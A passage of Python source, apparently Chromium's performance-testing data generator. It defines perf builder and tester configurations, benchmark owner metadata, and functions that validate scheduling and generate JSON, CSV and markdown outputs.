'perf_trigger':
False,
},
'android_arm64-builder-perf': {
'additional_compile_targets': [
'microdump_stackwalk',
'chrome_apk',
'system_webview_google_apk',
'android_tools',
'cc_perftests',
'chrome_public_apk',
'chromium_builder_perf',
'gpu_perftests',
'push_apps_to_background_apk',
'system_webview_apk',
'system_webview_shell_apk',
'telemetry_weblayer_apks',
],
'tests': [
{
'name': 'resource_sizes_monochrome_minimal_apks',
'isolate': 'resource_sizes_monochrome_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_monochrome_public_minimal_apks',
'isolate': 'resource_sizes_monochrome_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_chrome_modern_public_minimal_apks',
'isolate': 'resource_sizes_chrome_modern_public_minimal_apks',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_trichrome',
'isolate': 'resource_sizes_trichrome',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_trichrome_google',
'isolate': 'resource_sizes_trichrome_google',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_bundle',
'isolate': 'resource_sizes_system_webview_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
{
'name': 'resource_sizes_system_webview_google_bundle',
'isolate': 'resource_sizes_system_webview_google_bundle',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'linux-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86-64',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'linux-builder-perf-rel': {
'additional_compile_targets': ['chromium_builder_perf'],
},
'mac-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86-64',
'os': 'Mac',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'mac-arm-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86',
'os': 'Mac',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'win32-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86',
'os': 'Windows',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'win64-builder-perf': {
'additional_compile_targets': ['chromedriver', 'chromium_builder_perf'],
'tests': [{
'name': 'chrome_sizes',
'isolate': 'chrome_sizes',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
}],
'dimension': {
'cpu': 'x86-64',
'os': 'Windows',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'android-go-perf': {
'tests': [{
'name': 'performance_test_suite',
'isolate': 'performance_test_suite_android_clank_chrome',
}],
'platform':
'android-chrome',
'dimension': {
'device_os': 'OMB1.180119.001',
'device_type': 'gobo',
'device_os_flavor': 'google',
'pool': 'chrome.tests.perf',
'os': 'Android',
},
},
'android-go_webview-perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
}],
'platform': 'android-webview-google',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'gobo',
'device_os': 'OMB1.180119.001',
'device_os_flavor': 'google',
},
},
'Android Nexus5 Perf': {
'tests': [
{
'isolate': 'performance_test_suite_android_chrome',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'android',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'hammerhead',
'device_os': 'M4B30Z',
'device_os_flavor': 'google',
},
},
'Android Nexus5X WebView Perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
}],
'platform':
'android-webview',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'bullhead',
'device_os': 'MOB30K',
'device_os_flavor': 'aosp',
},
},
'android-pixel2_webview-perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
}],
'platform': 'android-webview-google',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
'android-pixel2_weblayer-perf': {
'tests': [{
'isolate': 'performance_weblayer_test_suite',
}],
'platform': 'android-weblayer',
'dimension': {
'pool': 'chrome.tests.perf-weblayer',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
'android-pixel2-perf': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_monochrome_64_32_bundle',
}],
'platform':
'android-chrome-64-bundle',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'walleye',
'device_os': 'OPM1.171019.021',
'device_os_flavor': 'google',
},
},
'android-pixel4_webview-perf': {
'tests': [{
'isolate': 'performance_webview_test_suite',
}],
'platform': 'android-webview-trichrome-google-bundle',
'dimension': {
'pool': 'chrome.tests.perf-webview',
'os': 'Android',
'device_type': 'flame',
'device_os': 'R',
'device_os_flavor': 'google',
},
},
'android-pixel4_weblayer-perf': {
'tests': [{
'isolate': 'performance_weblayer_test_suite',
}],
'platform': 'android-weblayer-trichrome-google-bundle',
'dimension': {
'pool': 'chrome.tests.perf-weblayer',
'os': 'Android',
'device_type': 'flame',
'device_os': 'R',
'device_os_flavor': 'google',
},
},
'android-pixel4-perf': {
'tests': [{
'isolate':
'performance_test_suite_android_clank_trichrome_bundle',
}],
'platform':
'android-trichrome-bundle',
'dimension': {
'pool': 'chrome.tests.perf',
'os': 'Android',
'device_type': 'flame',
'device_os': 'R',
'device_os_flavor': 'google',
},
},
'android-pixel4a_power-perf': {
'tests': [{
'isolate': 'performance_test_suite_android_clank_chrome',
'extra_args': [
'--experimental-tbmv3-metrics',
],
}],
'platform':
'android-chrome',
'dimension': {
'pool': 'chrome.tests.pinpoint', # Sharing Pinpoint pool
'os': 'Android',
'device_type': 'sunfish',
'device_os': 'RQ1D.201205.012',
'device_os_flavor': 'google',
},
},
'win-10_laptop_low_end-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-18363.476',
'gpu': '8086:1616-20.19.15.5070',
# TODO(crbug.com/998161): Add synthetic product name for these.
# They don't have this dimension yet since, as of this writing, they
# are still in pool 'unassigned'.
},
},
'win-10-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-18363.476',
'gpu': '8086:5912-27.20.100.8681',
'synthetic_product_name': 'OptiPlex 7050 (Dell Inc.)'
},
},
'win-10_amd-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-18363.476',
'gpu': '1002:15d8-27.20.1034.6',
'synthetic_product_name': '11A5S4L300 [ThinkCentre M75q-1] (LENOVO)'
},
},
'win-10_amd_laptop-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# Explicitly set GPU driver version and Windows OS version such
# that we can be informed if this
# version ever changes or becomes inconsistent. It is important
# that bots are homogeneous. See crbug.com/988045 for history.
'os': 'Windows-10-19043.1052',
'gpu': '1002:1638-10.0.19041.868',
'synthetic_product_name': 'OMEN by HP Laptop 16-c0xxx [ ] (HP)',
},
},
'Win 7 Perf': {
'tests': [
{
'isolate': 'performance_test_suite',
},
],
'platform': 'win',
'target_bits': 32,
'dimension': {
'gpu': '102b:0532-6.1.7600.16385',
'os': 'Windows-2008ServerR2-SP1',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R210 II (Dell Inc.)',
},
},
'Win 7 Nvidia GPU Perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'win',
'target_bits':
64,
'dimension': {
'gpu': '10de:1cb3-23.21.13.8792',
'os': 'Windows-2008ServerR2-SP1',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R220 [01] (Dell Inc.)'
},
},
'mac-10_12_laptop_low_end-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'mac',
'dimension': {
'cpu':
'x86-64',
'gpu':
'8086:1626',
'os':
'Mac-10.12.6',
'pool':
'chrome.tests.perf',
'synthetic_product_name':
'MacBookAir7,2_x86-64-i5-5350U_Intel Broadwell HD Graphics 6000_8192_APPLE SSD SM0128G'
},
},
'mac-m1_mini_2020-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'mac',
'dimension': {
'cpu': 'arm',
'mac_model': 'Macmini9,1',
'os': 'Mac',
'pool': 'chrome.tests.perf',
},
},
'linux-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'linux',
'dimension': {
'gpu': '10de:1cb3-440.100',
'os': 'Ubuntu-18.04',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R230 (Dell Inc.)'
},
},
'linux-perf-rel': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'linux',
'dimension': {
'gpu': '10de:1cb3-440.100',
'os': 'Ubuntu-18.04',
'pool': 'chrome.tests.perf',
'synthetic_product_name': 'PowerEdge R230 (Dell Inc.)'
},
},
'mac-10_13_laptop_high_end-perf': {
'tests': [
{
'isolate': 'performance_test_suite',
'extra_args': [
'--assert-gpu-compositing',
],
},
],
'platform':
'mac',
'dimension': {
'cpu':
'x86-64',
'gpu':
'1002:6821-4.0.20-3.2.8',
'os':
'Mac-10.13.3',
'pool':
'chrome.tests.perf',
'synthetic_product_name':
'MacBookPro11,5_x86-64-i7-4870HQ_AMD Radeon R8 M370X 4.0.20 [3.2.8]_Intel Haswell Iris Pro Graphics 5200 4.0.20 [3.2.8]_16384_APPLE SSD SM0512G',
},
},
'linux-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'android-go-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'android-pixel2-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'android-pixel2_webview-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'win-10-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'win-10_laptop_low_end-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'mac-10_12_laptop_low_end-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'mac-10_13_laptop_high_end-processor-perf': {
'platform': 'linux',
'perf_processor': True,
},
'chromecast-linux-builder-perf': {
'additional_compile_targets': ['cast_shell'],
'tests': [
{
'name': 'resource_sizes_chromecast',
'isolate': 'resource_sizes_chromecast',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86-64',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'chromeos-amd64-generic-lacros-builder-perf': {
'additional_compile_targets': ['chrome'],
'tests': [
{
'name': 'resource_sizes_lacros_chrome',
'isolate': 'resource_sizes_lacros_chrome',
'type': TEST_TYPES.GENERIC,
'resultdb': {
'has_native_resultdb_integration': True,
},
},
],
'dimension': {
'cpu': 'x86-64',
'os': 'Ubuntu-16.04',
'pool': 'chrome.tests',
},
'perf_trigger':
False,
},
'lacros-eve-perf': {
'tests': [
{
'isolate':
'performance_test_suite_eve',
'extra_args': [
# The magic hostname that resolves to a CrOS device in the test lab
'--remote=variable_chromeos_device_hostname',
],
},
],
'platform':
'lacros',
'target_bits':
64,
'dimension': {
'pool': 'chrome.tests.perf',
# TODO(crbug.com/971204): Explicitly set the gpu to None to make
# chromium_swarming recipe_module ignore this dimension.
'gpu': None,
'os': 'ChromeOS',
'device_status': 'available',
'device_type': 'eve',
},
},
}
# pylint: enable=line-too-long
_TESTER_SERVICE_ACCOUNT = (
'chrome-tester@chops-service-accounts.iam.gserviceaccount.com')
def update_all_builders(file_path):
return (_update_builders(BUILDERS, file_path) and
is_perf_benchmarks_scheduling_valid(file_path, sys.stderr))
def update_all_fyi_builders(file_path):
return _update_builders(FYI_BUILDERS, file_path)
def update_all_calibration_builders(file_path):
return _update_builders(CALIBRATION_BUILDERS, file_path)
def _update_builders(builders_dict, file_path):
tests = {}
tests['AAAAA1 AUTOGENERATED FILE DO NOT EDIT'] = {}
tests['AAAAA2 See //tools/perf/generate_perf_data to make changes'] = {}
for name, config in builders_dict.items():
tests[name] = generate_builder_config(config, name)
with open(file_path, 'w') as fp:
json.dump(tests, fp, indent=2, separators=(',', ': '), sort_keys=True)
fp.write('\n')
return True
def merge_dicts(*dict_args):
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
class BenchmarkMetadata(object):
def __init__(self, emails, component='', documentation_url='', stories=None):
"""An object to hold information about a benchmark.
Args:
emails: A string with a comma separated list of owner emails.
component: An optional string with a component for filing bugs about this
benchmark.
documentation_url: An optional string with a URL where documentation
about the benchmark can be found.
stories: An optional list of benchmark_utils.StoryInfo tuples with
information about stories contained in this benchmark.
"""
self.emails = emails
self.component = component
self.documentation_url = documentation_url
if stories is not None:
assert isinstance(stories, list)
self.stories = stories
else:
self.stories = []
@property
def tags(self):
"""Return a comma separated list of all tags used by benchmark stories."""
return ','.join(sorted(set().union(*(s.tags for s in self.stories))))
GTEST_BENCHMARKS = {
'base_perftests':
BenchmarkMetadata(
'skyostil@chromium.org, gab@chromium.org', 'Internals>SequenceManager',
('https://chromium.googlesource.com/chromium/src/+/HEAD/base/' +
'README.md#performance-testing')),
'gpu_perftests':
BenchmarkMetadata(
'reveman@chromium.org, chrome-gpu-perf-owners@chromium.org',
'Internals>GPU'),
'tracing_perftests':
BenchmarkMetadata('eseckler@chromium.org, oysteine@chromium.org',
'Speed>Tracing'),
'load_library_perf_tests':
BenchmarkMetadata('xhwang@chromium.org, jrummell@chromium.org',
'Internals>Media>Encrypted'),
'performance_browser_tests':
BenchmarkMetadata('johnchen@chromium.org, jophba@chromium.org',
'Internals>Media>ScreenCapture'),
'views_perftests':
BenchmarkMetadata('tapted@chromium.org', 'Internals>Views'),
'components_perftests':
BenchmarkMetadata('csharrison@chromium.org'),
'dawn_perf_tests':
BenchmarkMetadata(
'enga@chromium.org, chrome-gpu-perf-owners@chromium.org',
'Internals>GPU>Dawn',
'https://dawn.googlesource.com/dawn/+/HEAD/src/tests/perf_tests/README.md'
),
}
RESOURCE_SIZES_METADATA = BenchmarkMetadata(
'agrieve@chromium.org, jbudorick@chromium.org',
'Build',
('https://chromium.googlesource.com/chromium/src/+/HEAD/'
'tools/binary_size/README.md#resource_sizes_py'))
OTHER_BENCHMARKS = {
'resource_sizes_chrome_modern_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_chrome_modern_public_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_monochrome_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_monochrome_public_minimal_apks': RESOURCE_SIZES_METADATA,
'resource_sizes_trichrome': RESOURCE_SIZES_METADATA,
'resource_sizes_trichrome_google': RESOURCE_SIZES_METADATA,
'resource_sizes_system_webview_bundle': RESOURCE_SIZES_METADATA,
'resource_sizes_system_webview_google_bundle': RESOURCE_SIZES_METADATA,
}
OTHER_BENCHMARKS.update({
'chrome_sizes':
BenchmarkMetadata(
emails='heiserya@chromium.org, johnchen@chromium.org',
component='Build',
documentation_url=(
'https://chromium.googlesource.com/chromium/'
'src/+/HEAD/tools/binary_size/README.md#resource_sizes_py'),
),
})
OTHER_BENCHMARKS.update({
'resource_sizes_chromecast':
BenchmarkMetadata(
emails='juke@chromium.org, eliribble@chromium.org',
component='Chromecast',
documentation_url=(
'https://chromium.googlesource.com/chromium/'
'src/+/HEAD/tools/binary_size/README.md#resource_sizes_py'),
),
})
OTHER_BENCHMARKS.update({
'resource_sizes_lacros_chrome':
BenchmarkMetadata(
emails='erikchen@chromium.org, huangs@chromium.org',
component='OS>LaCrOS',
documentation_url=(
'https://chromium.googlesource.com/chromium/'
'src/+/HEAD/tools/binary_size/README.md#resource_sizes_py'),
),
})
SYSTEM_HEALTH_BENCHMARKS = set([
'system_health.common_desktop',
'system_health.common_mobile',
'system_health.memory_desktop',
'system_health.memory_mobile',
])
# Valid test suite (benchmark) names should match this regex.
RE_VALID_TEST_SUITE_NAME = r'^[\w._-]+$'
def _get_telemetry_perf_benchmarks_metadata():
metadata = {}
for benchmark in benchmark_finders.GetOfficialBenchmarks():
benchmark_name = benchmark.Name()
emails = decorators.GetEmails(benchmark)
if emails:
emails = ', '.join(emails)
metadata[benchmark_name] = BenchmarkMetadata(
emails=emails,
component=decorators.GetComponent(benchmark),
documentation_url=decorators.GetDocumentationLink(benchmark),
stories=benchmark_utils.GetBenchmarkStoryInfo(benchmark()))
return metadata
TELEMETRY_PERF_BENCHMARKS = _get_telemetry_perf_benchmarks_metadata()
PERFORMANCE_TEST_SUITES = [
'performance_test_suite',
'performance_test_suite_eve',
'performance_webview_test_suite',
'performance_weblayer_test_suite',
]
for suffix in android_browser_types.TELEMETRY_ANDROID_BROWSER_TARGET_SUFFIXES:
PERFORMANCE_TEST_SUITES.append('performance_test_suite' + suffix)
def get_scheduled_non_telemetry_benchmarks(perf_waterfall_file):
test_names = set()
with open(perf_waterfall_file) as f:
tests_by_builder = json.load(f)
script_tests = []
for tests in tests_by_builder.values():
if 'isolated_scripts' in tests:
script_tests += tests['isolated_scripts']
if 'scripts' in tests:
script_tests += tests['scripts']
for s in script_tests:
name = s['name']
# TODO(eyaich): Determine new way to generate ownership based
# on the benchmark bot map instead of on the generated tests
# for new perf recipe.
if name not in PERFORMANCE_TEST_SUITES:
test_names.add(name)
for platform in bot_platforms.ALL_PLATFORMS:
for executable in platform.executables:
test_names.add(executable.name)
return test_names
def is_perf_benchmarks_scheduling_valid(
perf_waterfall_file, outstream):
"""Validates that all existing benchmarks are properly scheduled.
Return: True if all benchmarks are properly scheduled, False otherwise.
"""
scheduled_non_telemetry_tests = get_scheduled_non_telemetry_benchmarks(
perf_waterfall_file)
all_perf_gtests = set(GTEST_BENCHMARKS)
all_perf_other_tests = set(OTHER_BENCHMARKS)
error_messages = []
for test_name in all_perf_gtests - scheduled_non_telemetry_tests:
error_messages.append(
'Benchmark %s is tracked but not scheduled on any perf waterfall '
'builders. Either schedule or remove it from GTEST_BENCHMARKS.'
% test_name)
for test_name in all_perf_other_tests - scheduled_non_telemetry_tests:
error_messages.append(
'Benchmark %s is tracked but not scheduled on any perf waterfall '
'builders. Either schedule or remove it from OTHER_BENCHMARKS.'
% test_name)
for test_name in scheduled_non_telemetry_tests.difference(
all_perf_gtests, all_perf_other_tests):
error_messages.append(
'Benchmark %s is scheduled on perf waterfall but not tracked. Please '
'add an entry for it in GTEST_BENCHMARKS or OTHER_BENCHMARKS in '
'//tools/perf/core/perf_data_generator.py.' % test_name)
for message in error_messages:
print('*', textwrap.fill(message, 70), '\n', file=outstream)
return not error_messages
# Verify that all benchmarks have owners.
def _verify_benchmark_owners(benchmark_metadatas):
unowned_benchmarks = set()
for benchmark_name in benchmark_metadatas:
if benchmark_metadatas[benchmark_name].emails is None:
unowned_benchmarks.add(benchmark_name)
assert not unowned_benchmarks, (
'All benchmarks must have owners. Please add owners for the following '
'benchmarks:\n%s' % '\n'.join(unowned_benchmarks))
# Open a CSV file for writing, handling the differences between Python 2 and 3.
def _create_csv(file_path):
if sys.version_info.major == 2:
return open(file_path, 'wb')
else:
return open(file_path, 'w', newline='')
def update_benchmark_csv(file_path):
"""Updates go/chrome-benchmarks.
Updates telemetry/perf/benchmark.csv containing the current benchmark names,
owners, and components. Requires that all benchmarks have owners.
"""
header_data = [
['AUTOGENERATED FILE DO NOT EDIT'],
[
'See the following link for directions for making changes ' +
'to this data:', 'https://bit.ly/update-benchmarks-info'
],
[
'Googlers can view additional information about internal perf ' +
'infrastructure at',
'https://goto.google.com/chrome-benchmarking-sheet'
],
[
'Benchmark name', 'Individual owners', 'Component', 'Documentation',
'Tags'
]
]
csv_data = []
benchmark_metadatas = merge_dicts(
GTEST_BENCHMARKS, OTHER_BENCHMARKS, TELEMETRY_PERF_BENCHMARKS)
_verify_benchmark_owners(benchmark_metadatas)
undocumented_benchmarks = set()
for benchmark_name in benchmark_metadatas:
if not re.match(RE_VALID_TEST_SUITE_NAME, benchmark_name):
raise ValueError('Invalid benchmark name: %s' % benchmark_name)
if not benchmark_metadatas[benchmark_name].documentation_url:
undocumented_benchmarks.add(benchmark_name)
csv_data.append([
benchmark_name,
benchmark_metadatas[benchmark_name].emails,
benchmark_metadatas[benchmark_name].component,
benchmark_metadatas[benchmark_name].documentation_url,
benchmark_metadatas[benchmark_name].tags,
])
if undocumented_benchmarks != ub_module.UNDOCUMENTED_BENCHMARKS:
error_message = (
'The list of known undocumented benchmarks does not reflect the actual '
'ones.\n')
if undocumented_benchmarks - ub_module.UNDOCUMENTED_BENCHMARKS:
error_message += (
'New undocumented benchmarks found. Please document them before '
'enabling on perf waterfall: %s' % (
','.join(b for b in undocumented_benchmarks -
ub_module.UNDOCUMENTED_BENCHMARKS)))
if ub_module.UNDOCUMENTED_BENCHMARKS - undocumented_benchmarks:
error_message += (
'These benchmarks are already documented. Please remove them from '
'the UNDOCUMENTED_BENCHMARKS list in undocumented_benchmarks.py: %s' %
(','.join(b for b in ub_module.UNDOCUMENTED_BENCHMARKS -
undocumented_benchmarks)))
raise ValueError(error_message)
csv_data = sorted(csv_data, key=lambda b: b[0])
csv_data = header_data + csv_data
with _create_csv(file_path) as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerows(csv_data)
return True
def update_system_health_stories(filepath):
"""Updates bit.ly/csh-stories.
Updates tools/perf/system_health_stories.csv containing the current set
of system health stories.
"""
header_data = [['AUTOGENERATED FILE DO NOT EDIT'],
['See //tools/perf/core/perf_data_generator.py to make changes'],
['Story', 'Description', 'Platforms', 'Tags']
]
stories = {}
for benchmark_name in sorted(SYSTEM_HEALTH_BENCHMARKS):
platform = benchmark_name.rsplit('_', 1)[-1]
for story in TELEMETRY_PERF_BENCHMARKS[benchmark_name].stories:
if story.name not in stories:
stories[story.name] = {
'description': story.description,
'platforms': set([platform]),
'tags': set(story.tags)
}
else:
stories[story.name]['platforms'].add(platform)
stories[story.name]['tags'].update(story.tags)
with _create_csv(filepath) as f:
writer = csv.writer(f, lineterminator='\n')
for row in header_data:
writer.writerow(row)
for story_name, info in sorted(stories.items()):
platforms = ','.join(sorted(info['platforms']))
tags = ','.join(sorted(info['tags']))
writer.writerow([story_name, info['description'], platforms, tags])
return True
def update_labs_docs_md(filepath):
configs = collections.defaultdict(list)
for tester in bot_platforms.ALL_PLATFORMS:
if not tester.is_fyi:
configs[tester.platform].append(tester)
with open(filepath, 'w') as f:
f.write("""
[comment]: # (AUTOGENERATED FILE DO NOT EDIT)
[comment]: # (See //tools/perf/generate_perf_data to make changes)
# Platforms tested in the Performance Lab
""")
for platform, testers in sorted(configs.items()):
f.write('## %s\n\n' % platform.title())
testers.sort()
for tester in testers:
f.write(' * [{0.name}]({0.builder_url}): {0.description}.\n'.format(
tester))
f.write('\n')
return True
def generate_telemetry_args(tester_config, platform):
# First determine the browser that you need based on the tester
browser_name = ''
# For trybot testing we always use the reference build
if tester_config.get('testing', False):
browser_name = 'reference'
elif 'browser' in tester_config:
browser_name = 'exact'
elif tester_config['platform'] == 'android':
browser_name = 'android-chromium'
elif tester_config['platform'].startswith('android-'):
browser_name = tester_config['platform']
elif tester_config['platform'] == 'chromeos':
browser_name = 'cros-chrome'
elif tester_config['platform'] == 'lacros':
browser_name = 'lacros-chrome'
elif (tester_config['platform'] == 'win'
and tester_config['target_bits'] == 64):
browser_name = 'release_x64'
elif tester_config['platform'] == 'fuchsia':
browser_name = 'web-engine-shell'
else:
browser_name = 'release'
test_args = [
'-v',
'--browser=%s' % browser_name,
'--upload-results',
'--test-shard-map-filename=%s' % platform.shards_map_file_name,
]
if platform.run_reference_build:
test_args.append('--run-ref-build')
if 'browser' in tester_config:
test_args.append('--browser-executable=../../out/Release/%s' %
tester_config['browser'])
if tester_config['platform'].startswith('android'):
test_args.append('--device=android')
return test_args
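# As a rough sketch of the output (values are illustrative, assuming a
# plain 'linux' tester with no 'browser' or 'testing' keys), the function
# above would return something like:
#
#   ['-v', '--browser=release', '--upload-results',
#    '--test-shard-map-filename=<platform shard map file>']
#
# plus '--run-ref-build' when the platform is configured to run the
# reference build.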
def generate_gtest_args(test_name):
# --gtest-benchmark-name so the benchmark name is consistent with the test
# step's name. This is not always the same as the test binary's name (see
# crbug.com/870692).
return [
'--gtest-benchmark-name', test_name,
]
def generate_performance_test(tester_config, test, builder_name):
isolate_name = test['isolate']
test_name = test.get('name', isolate_name)
test_type = test.get('type', TEST_TYPES.TELEMETRY)
assert test_type in TEST_TYPES.ALL
shards = test.get('num_shards', None)
test_args = []
if test_type == TEST_TYPES.TELEMETRY:
platform = bot_platforms.PLATFORMS_BY_NAME[builder_name]
test_args += generate_telemetry_args(tester_config, platform)
assert shards is None
shards = platform.num_shards
elif test_type == TEST_TYPES.GTEST:
test_args += generate_gtest_args(test_name=test_name)
assert shards
# Append any additional args specific to an isolate
test_args += test.get('extra_args', [])
result = {
'args': test_args,
'isolate_name': isolate_name,
'name': test_name,
'override_compile_targets': [
isolate_name
]
}
if test.get('resultdb'):
result['resultdb'] = test['resultdb'].copy()
elif 'builder-perf' not in builder_name:
# Enable Result DB on all perf test bots. Builders with names including
# "builder-perf" are used for compiling only, and do not run perf tests.
# TODO(crbug.com/1135718): Replace the following line by specifying either
# "result_format" for GTests, or "has_native_resultdb_integration" for all
# other tests.
result['resultdb'] = {'enable': True}
# For now we either get shards from the number of devices specified
# or a test entry needs to specify the num shards if it supports
# soft device affinity.
if tester_config.get('perf_trigger', True):
result['trigger_script'] = {
'requires_simultaneous_shard_dispatch': True,
'script': '//testing/trigger_scripts/perf_device_trigger.py',
'args': [
'--multiple-dimension-script-verbose',
'True'
],
}
if builder_name in DYNAMIC_SHARDING_TESTERS:
result['trigger_script']['args'].append('--use-dynamic-shards')
result['merge'] = {
'script': '//tools/perf/process_perf_results.py',
}
if builder_name in LIGHTWEIGHT_TESTERS:
result['merge']['args'] = ['--lightweight', '--skip-perf']
result['swarming'] = {
# Always say this is true regardless of whether the tester
# supports swarming. It doesn't hurt.
'can_use_on_swarming_builders': True,
'expiration': 2 * 60 * 60, # 2 hours pending max
# TODO(crbug.com/865538): once we have plenty of Windows hardware to
# shard perf benchmarks on Win builders, reduce this hard timeout
# limit to ~2 hrs.
# Note that the builder seems to time out after 7 hours
# (crbug.com/1036447), so we must timeout the shards within ~6 hours to
# allow for other overhead. If the overall builder times out then we
# don't get data even from the passing shards.
'hard_timeout': int(6 * 60 * 60), # 6 hours timeout for full suite
'ignore_task_failure': False,
# 6 hour timeout. Note that this is effectively the timeout for a
# benchmarking subprocess to run since we intentionally do not stream
# subprocess output to the task stdout.
# TODO(crbug.com/865538): Reduce this once we can reduce hard_timeout.
'io_timeout': int(6 * 60 * 60),
'dimension_sets': [tester_config['dimension']],
'service_account': _TESTER_SERVICE_ACCOUNT,
}
if shards:
result['swarming']['shards'] = shards
return result
def generate_builder_config(condensed_config, builder_name):
config = {}
if 'additional_compile_targets' in condensed_config:
config['additional_compile_targets'] = (
condensed_config['additional_compile_targets'])
